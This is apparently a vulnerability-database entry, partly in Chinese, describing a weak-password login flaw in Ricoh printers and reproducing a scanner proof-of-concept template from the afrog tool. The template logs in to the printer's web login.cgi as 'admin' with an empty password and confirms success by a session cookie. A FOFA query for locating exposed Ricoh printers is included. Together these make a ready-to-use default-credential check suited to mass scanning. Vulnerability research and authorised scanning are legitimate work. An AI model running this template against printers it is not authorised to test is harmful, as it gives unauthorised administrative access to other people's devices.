ricoh-weak-password: Ricoh Weak Password

日期: 2025-09-01 | 影响软件: 未知 | POC: 已公开

漏洞描述

Ricoh printer weak password login. fofa: app="RICOH-打印机"

PoC代码[已公开]

id: ricoh-weak-password

info:
  name: Ricoh Weak Password
  author: gy741
  severity: high
  verified: false
  description: |-
    Ricoh printer weak password login.
    fofa: app="RICOH-打印机"
  tags: ricoh,defaultpassword
  created: 2023/10/30

set:
  user1: "base64('admin')"
rules:
  r0:
    request:
      method: POST
      path: /web/guest/en/websys/webArch/login.cgi
      headers:
        Cookie: cookieOnOffChecker=on;
      body: wimToken=&userid_work=&userid={{user1}}&password_work=&password=&open=
    expression: response.status == 200 && 'wimsesid=[0-9]+'.bmatches(response.raw_header)
expression: r0()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/default-pwd/ricoh-weak-password.yaml